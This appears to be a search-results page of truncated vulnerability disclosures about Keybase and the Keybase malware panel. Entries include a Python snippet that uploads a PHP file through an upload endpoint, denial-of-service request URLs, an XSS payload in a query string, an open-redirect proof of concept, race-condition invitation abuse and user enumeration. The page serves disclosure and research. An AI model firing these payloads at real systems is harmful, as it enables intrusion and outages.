136 matches found
Malware exploit: Keybase
Type: Upload vulnerability Author: Unit42 import requests import sys if lensys.argv != 2: print "Usage: %s phpfile" % file sys.exit1 URL = "" print "Sending request..." multiplefiles = 'file', 'WIN-JJFOIJGL6514222.php', opensys.argv1, 'rb' r = requests.postURL + "image/upload.php",...
Keybase: Denial of Service through set_preference.json
Hey there, When selecting an image at https://keybase.io//api/1.0/image/setpreference.json, passing an invalid value in identitysrc knocks the server down for 20-30 seconds, with just one request. I have verified this by visiting an external website that checks if a website is down. POC: 1. Conne...
Keybase: Register multiple users using one invitation (race condition)
Hi, It is possible to create multiple accounts using a single invitationid due to a race condition bug in //api/1.0/signup.json. I have successfully created 8 accounts using invitation with id = 37c5a121adf23e90b875500d The account usernames: novijosiptest1,2,4,5,6,8,9,10 you can delete them, I...
Keybase: Content spoofing due to the improper behavior of the not-found meesage
Hay , At dist.keybase.io , It's possible to inject text in the not-found message in order to trick the user to make him visit website or do something an attacker might be interested in . PoC : https://goo.gl/3WO6iH I've shortened this one because it's really long , it's needed to be on google...
Keybase: Race conditions can be used to bypass invitation limit
Hi, I have received 3 invites from Chris I might have screwed up the PGP email, but thanks anyway, added to my account https://keybase.io/josipfranjkovic. Using race conditions, I was able to send out a total of 7 invites to my throwaway emails, obviously bypassing the 3 invitations limit. Here a...
Keybase: Remote Server Restart Lead to Denial of Service by only one Request.
https://keybase.io//api/1.0/getsalt.json?uid=36965a2dc9bbd814e8558a77040c5419 Poc: set wrong uid in this examble i chabge last numbre from 9 to 8 https://keybase.io//api/1.0/getsalt.json?uid=36965a2dc9bbd814e8558a77040c5418...
Keybase: Remote Server Restart Lead to Denial of Server by only one Request.
URL === https://keybase.io//api/1.0/merkle/block.json?hash=68b5d3599be9acbe97bcc45603a322f85f8a99b9cbc696592fe1088c3a099a45d929f0bc2fae2230f0b31b5e4b4122365f50b34fcf91a94a357df90a83e3b013 Poc: ==== https://keybase.io//api/1.0/merkle/block.json?hash=1 see video...
keybase.io XSS vulnerability
Vulnerable URL: https://keybase.io//api/1.0/user/lookup.json?usernames=fakeuser1%2cfakeuser2'%22%26%25prompt/XSSPOSED/...
Keybase: Un-handled exception leads to Information Disclosure
Steps: 1. Login to https://keybase.io/ 2. Click on Me icon from top-right button https://keybase.io/username 3. Click on Edit picture button https://keybase.io/usernameedit-me 4. Intercept the traffic using proxy tool e,g, Burp Suite 5. Click on "Prove my Twitter identity" link 6. In the request,...
Keybase: xss
This xss issue only affects content sniffing browsers older versions that don't see the X-Content-Type-Options: nosniff header that you're sending. https://keybase.io//api/1.0/user/lookup.json?usernames=fakeuser1%2cfakeuser2'%22%26%25prompt/XSS/ This returns a page that contains this information:...
Keybase: [keybase.io] Open Redirect
PoC https://keybase.io//www.google.com/%2f%2e%2e HTTP Response: HTTP/1.1 303 See Other ... Location: //www.google.com/%2f%2e%2e/...
Keybase: Sensitive server-side/application information disclosure
There is an Information disclosure vulnerability present in Keybase API request whenever an exception occurs. Steps to reproduce: Open the following URL in any browser - https://keybase.io//api/1.0/user/lookup.json?twitter=john&github=john&usernames=john&usernames=rock Observe that when we add...
Keybase: Full path disclosure at https://keybase.io/_/api/1.0/invitation_request.json
When we send a POST-request to https://keybase.io//api/1.0/invitationrequest.json with multiple fullname parameters, for example: [email protected]&fullname=1&fullname=2 we get an error response, which contains infromation about the server paths and code: TypeError: Object 1,2 has no method...
Keybase: No rate limiting for sensitive actions (like "forgot password") enables user enumeration
Hi there, I noticed a small information leak which allows an attacker to check whether an email address is associated with an account. Steps to reproduce: Send a POST-Request to the url POST //api/1.0/send-reset-pw.json HTTP/1.1 as the following example shows: POST //api/1.0/send-reset-pw.json...
Keybase: SMTP protection not used
Hi I'm checking your website found spf record there. You should apply strict SMPT policy to stop spoofed email sending from your domain. An attacker would send a Fake email from [email protected] saying that Please change your password, The victim is aware of phishing attacks, But when he sees...
Keybase: NO SPF RECORDS
NO SPF RECORDS for keybase.io http://www.kitterman.com/spf/validate.html...